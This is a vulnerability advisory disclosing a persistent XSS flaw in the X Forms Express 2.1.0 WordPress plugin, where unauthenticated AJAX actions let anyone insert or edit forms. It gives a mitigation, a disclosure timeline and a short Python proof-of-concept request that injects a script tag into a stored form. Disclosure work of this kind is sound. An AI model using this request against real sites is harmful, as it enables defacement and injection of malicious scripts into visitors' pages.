X Forms Express 2.1.0, Persistent XSS

Due to exposing two AJAX functions to anonymous users by using the ‘nopriv’ method of adding AJAX actions, anonymous users are able to insert new forms, and edit the content of existing forms. Utilizing either of these methods can result in a Persistent XSS attack, defacement of website content, or injection of malicious scripts / iframes.

Homepage

https://wordpress.org/plugins/x-forms-express/

CVSS Score

4

CSSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Remove the two vulnerable AJAX definitions in the ‘includes/Core/class.db.php’ file, specifically ‘wp_ajax_nopriv_do_insert’ and ‘wp_ajax_nopriv_do_edit’. Inadequate response from vendor – would advise against using this plugin

Proof of Concept

The following Python script will update the content of the form with the ID of 1 to contain the content specified in the “form_fields” payload field.

import requests
url = 'http://localhost/wp-admin/admin-ajax.php'
payload = {
	"action":"do_edit",
	"table":"wap_x_forms",
	"edit_Id":1,
	"form_fields":"<script>alert('.');</script>"}
r = requests.post(url, data=payload)

Timeline

  • 2014-09-19: Discovered
  • 2014-09-19: Reported to vendor:
  • 2014-09-19: CVE requested
  • 2014-09-22: CVE assigned
  • 2014-09-22: Update requested from vendor
  • 2014-09-29: Update requested from vendor
  • 2014-10-02: Response received from vendor requesting more information – link to report provided
  • 2014-10-06: Update requested from vendor
  • 2014-10-07: Response received from vendor – fresh link provided
  • 2014-10-19: Update requested from vendor
  • 2014-10-21: Advisory released